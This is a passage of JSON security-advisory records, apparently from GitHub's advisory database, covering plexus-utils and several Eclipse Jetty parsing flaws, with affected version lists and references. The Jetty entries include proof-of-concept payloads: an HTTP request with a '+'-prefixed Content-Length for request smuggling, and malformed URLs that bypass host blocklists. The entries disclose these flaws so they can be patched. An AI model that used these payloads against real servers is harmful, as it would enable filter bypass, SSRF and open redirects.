"1.5.5", "1.5.6", "1.5.7", "1.5.8", "1.5.9", "2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.1", "3.0", "3.0.1", "3.0.10", "3.0.11", "3.0.12", "3.0.13", "3.0.14", "3.0.15", "3.0.16", "3.0.17", "3.0.18", "3.0.19", "3.0.2", "3.0.20", "3.0.21", "3.0.22", "3.0.23", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-jcwr-x25h-x5fh/GHSA-jcwr-x25h-x5fh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4245" 
}, { "type": "WEB", "url": "https://github.com/codehaus-plexus/plexus-utils/issues/3" }, { "type": "WEB", "url": "https://github.com/codehaus-plexus/plexus-utils/commit/f933e5e78dc2637e485447ed821fe14904f110de" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2023:2135" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2023:3906" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2022-4245" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2149843" }, { "type": "PACKAGE", "url": "https://github.com/codehaus-plexus/plexus-utils" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGCODEHAUSPLEXUS-461102" } ], "database_specific": { "cwe_ids": [ "CWE-611", "CWE-91" ], "github_reviewed": true, "github_reviewed_at": "2023-09-26T19:38:53Z", "nvd_published_at": "2023-09-25T20:15:10Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cj7v-27pg-wf7q", "published": "2022-07-07T20:55:34Z", "modified": "2024-02-16T08:00:47.277184Z", "aliases": [ "CVE-2022-2047" ], "related": [ "CVE-2022-2047" ], "summary": "Jetty invalid URI parsing may produce invalid HttpURI.authority", "details": "### Description\nURI use within Jetty's `HttpURI` class can parse invalid URIs such as `http://localhost;/path` as having an authority with a host of `localhost;`.\n\nA URIs of the type `http://localhost;/path` should be interpreted to be either invalid or as `localhost;` to be the userinfo and no host.\nHowever, `HttpURI.host` returns `localhost;` which is definitely wrong.\n\n### Impact\nThis can lead to errors with Jetty's `HttpClient`, and Jetty's `ProxyServlet` / `AsyncProxyServlet` / `AsyncMiddleManServlet` wrongly interpreting an authority with no host as one with a host.\n\n### Patches\nPatched in PR [#8146](https://github.com/eclipse/jetty.project/pull/8146) for Jetty version 
9.4.47.\nPatched in PR [#8014](https://github.com/eclipse/jetty.project/pull/8015) for Jetty versions 10.0.10, and 11.0.10\n\n### Workarounds\nNone.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at security@webtide.com.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.4.47" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", 
"8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", 
"9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-cj7v-27pg-wf7q/GHSA-cj7v-27pg-wf7q.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": 
"pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.10" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-cj7v-27pg-wf7q/GHSA-cj7v-27pg-wf7q.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.10" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-cj7v-27pg-wf7q/GHSA-cj7v-27pg-wf7q.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-cj7v-27pg-wf7q" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2047" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/08/msg00011.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220901-0006" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5198" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-07-07T20:55:34Z", "nvd_published_at": "2022-07-07T21:15:00Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hmr7-m48g-48f6", "published": "2023-09-14T16:17:27Z", "modified": "2024-02-16T07:59:58.440241Z", "aliases": [ "CVE-2023-40167" ], "related": [ "CGA-j3h8-74jw-2w8w", 
"CGA-vqpm-qwj8-mfq5" ], "summary": "Jetty accepts \"+\" prefixed value in Content-Length", "details": "### Impact\n\nJetty accepts the '+' character preceding the content-length value in an HTTP/1 header field. This is more permissive than allowed by the RFC and other servers routinely reject such requests with 400 responses. There is no known exploit scenario, but it is conceivable that request smuggling could result if Jetty is used in combination with a server that does not close the connection after sending such a 400 response.\n\n### Workarounds\n\nThere is no workaround as there is no known exploit scenario. \n\n### Original Report \n\n[RFC 9110 Section 8.6](https://www.rfc-editor.org/rfc/rfc9110#section-8.6) defined the value of Content-Length header should be a string of 0-9 digits. However we found that Jetty accepts \"+\" prefixed Content-Length, which could lead to potential HTTP request smuggling.\n\nPayload:\n\n```\n POST / HTTP/1.1\n Host: a.com\n Content-Length: +16\n Connection: close\n ​\n 0123456789abcdef\n```\n\nWhen sending this payload to Jetty, it can successfully parse and identify the length.\n\nWhen sending this payload to NGINX, Apache HTTPd or other HTTP servers/parsers, they will return 400 bad request.\n\nThis behavior can lead to HTTP request smuggling and can be leveraged to bypass WAF or IDS.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.4.52" } ] } ], "versions": [ "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526",
"9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", 
"9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.51", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-hmr7-m48g-48f6/GHSA-hmr7-m48g-48f6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.16" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.15", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-hmr7-m48g-48f6/GHSA-hmr7-m48g-48f6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.16" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.10", "11.0.11", "11.0.12", 
"11.0.13", "11.0.14", "11.0.15", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.15", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-hmr7-m48g-48f6/GHSA-hmr7-m48g-48f6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "12.0.0" }, { "fixed": "12.0.1" } ] } ], "versions": [ "12.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-hmr7-m48g-48f6/GHSA-hmr7-m48g-48f6.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-hmr7-m48g-48f6" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40167" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00039.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5507" }, { "type": "WEB", "url": "https://www.rfc-editor.org/rfc/rfc9110#section-8.6" } ], "database_specific": { "cwe_ids": [ "CWE-130" ], "github_reviewed": true, "github_reviewed_at": "2023-09-14T16:17:27Z", "nvd_published_at": "2023-09-15T20:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qh8g-58pp-2wxh", "published": "2024-10-14T21:11:43Z", "modified": "2025-03-07T14:20:03.913209Z", "aliases": [ "CVE-2024-6763" ], "related": [ "CGA-ff4f-4xw3-x96m", "CGA-gp28-g32p-xvfg", "CGA-r9mv-rv77-836x" ], "summary": "Eclipse Jetty URI parsing of invalid authority", "details": "## Summary\n\nEclipse Jetty is a lightweight, highly scalable, 
Java-based web server and Servlet engine. It includes a utility class, `HttpURI`, for URI/URL parsing.\n\nThe `HttpURI` class does insufficient validation on the authority segment of a URI. However the behaviour of `HttpURI` differs from the common browsers in how it handles a URI that would be considered invalid if fully validated against the RFC. Specifically `HttpURI` and the browser may differ on the value of the host extracted from an invalid URI and thus a combination of Jetty and a vulnerable browser may be vulnerable to an open redirect attack or to an SSRF attack if the URI is used after passing validation checks.\n\n## Details\n\n### Affected components\n\nThe vulnerable component is the `HttpURI` class when used as a utility class in an application. The Jetty usage of the class is not vulnerable.\n\n### Attack overview\n\nThe `HttpURI` class does not properly validate the authority section of a URI. When presented with an illegal authority that may contain user info (e.g. username:password#@hostname:port), the parsing of the URI does not fail. Moreover, the interpretation of what part of the authority is the host name differs from a common browser in that they also do not fail, but they select a different host name from the illegal URI.\n\n### Attack scenario\n\nA typical attack scenario is illustrated in the diagram below. The Validator checks whether the attacker-supplied URL is on the blocklist. If not, the URI is passed to the Requester for redirection. The Requester is responsible for sending requests to the hostname specified by the URI.\n\nThis attack occurs when the Validator is the `org.eclipse.jetty.http.HttpURI` class and the Requester is the `Browser` (including Chrome, Firefox and Safari). An attacker can send a malformed URI to the Validator (e.g., `http://browser.check%23%40vulndetector.com/`). After validation, the Validator finds that the hostname is not on the blocklist.
However, the Requester can still send requests to the domain with the hostname `vulndetector.com`.\n\n## PoC\n\npayloads:\n\n```\nhttp://browser.check \u0026@vulndetector.com/\nhttp://browser.check #@vulndetector.com/\nhttp://browser.check?@vulndetector.com/\nhttp://browser.check#@vulndetector.com/\nhttp://vulndetector.com\\\\/\n```\n\nThe problem of 302 redirect parsing in HTML tag scenarios. Below is a poc example. After clicking the button, the browser will open \"browser.check\", and jetty will parse this URL as \"vulndetector.com\".\n\n```\n\u003ca href=\"http://browser.check#@vulndetector.com/\"\u003e\u003c/a\u003e\n```\nA comparison of the parsing differences between Jetty and chrome is shown in the table below (note that neither should accept the URI as valid).\n\n| Invalid URI | Jetty | Chrome |\n| ---------------------------------------------- | ---------------- | ------------- |\n| http://browser.check \u0026@vulndetector.com/ | vulndetector.com | browser.check |\n| http://browser.check #@vulndetector.com/ | vulndetector.com | browser.check |\n| http://browser.check?@vulndetector.com/ | vulndetector.com | browser.check |\n| http://browser.check#@vulndetector.com/ | vulndetector.com | browser.check |\n\nThe problem of 302 redirect parsing in HTTP 302 Location\n\n| Input | Jetty | Chrome |\n| ------------------------ | -------------- | ------------- |\n| http://browser.check%5c/ | browser.check\\ | browser.check |\n\nIt is noteworthy that Spring Web also faced similar security vulnerabilities, being affected by the aforementioned four types of payloads. These issues have since been resolved and have been assigned three CVE numbers [3-5].\n\n## Impact\n\nThe impact of this vulnerability is limited to developers that use the Jetty HttpURI directly. Example: your project implemented a blocklist to block on some hosts based on HttpURI's handling of authority section. 
The vulnerability will help attackers bypass the protections that developers have set up for hosts. The vulnerability will lead to **SSRF**[1] and **URL Redirection**[2] vulnerabilities in several cases. \n\n## Mitigation\n\nThe attacks outlined above rely on decoded user data being passed to the `HttpURI` class. Application should not pass decoded user data as an encoded URI to any URI class/method, including `HttpURI`. Such applications are likely to be vulnerable in other ways. \nThe immediate solution is to upgrade to a version of the class that will fully validate the characters of the URI authority. Ultimately, Jetty will deprecate and remove support for user info in the authority per [RFC9110 Section 4.2.4](https://datatracker.ietf.org/doc/html/rfc9110#section-4.2.4). \n\nNote that the Chrome (and other browsers) parse the invalid user info section improperly as well (due to flawed WhatWG URL parsing rules that do not apply outside of a Web Browser).\n\n## Reference\n\n[1] https://cwe.mitre.org/data/definitions/918.html\n[2] https://cwe.mitre.org/data/definitions/601.html", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "12.0.12" } ] } ], "versions": [ "10.0.0", "10.0.0-alpha0", "10.0.0.alpha1", "10.0.0.alpha2", "10.0.0.beta0", "10.0.0.beta1", "10.0.0.beta2", "10.0.0.beta3", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.16", "10.0.17", "10.0.18", "10.0.19", "10.0.2", "10.0.20", "10.0.21", "10.0.22", "10.0.23", "10.0.24", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9", "11.0.0", "11.0.0-alpha0", "11.0.0.beta1", "11.0.0.beta2", "11.0.0.beta3", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.14", "11.0.15", "11.0.16", "11.0.17", "11.0.18", "11.0.19", "11.0.2", "11.0.20", "11.0.21", "11.0.22", "11.0.23", "11.0.24", 
"11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9", "12.0.0", "12.0.0.alpha0", "12.0.0.alpha1", "12.0.0.alpha2", "12.0.0.alpha3", "12.0.0.beta0", "12.0.0.beta1", "12.0.0.beta2", "12.0.0.beta3", "12.0.0.beta4", "12.0.1", "12.0.10", "12.0.11", "12.0.2", "12.0.3", "12.0.4", "12.0.5", "12.0.6", "12.0.7", "12.0.8", "12.0.9", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", 
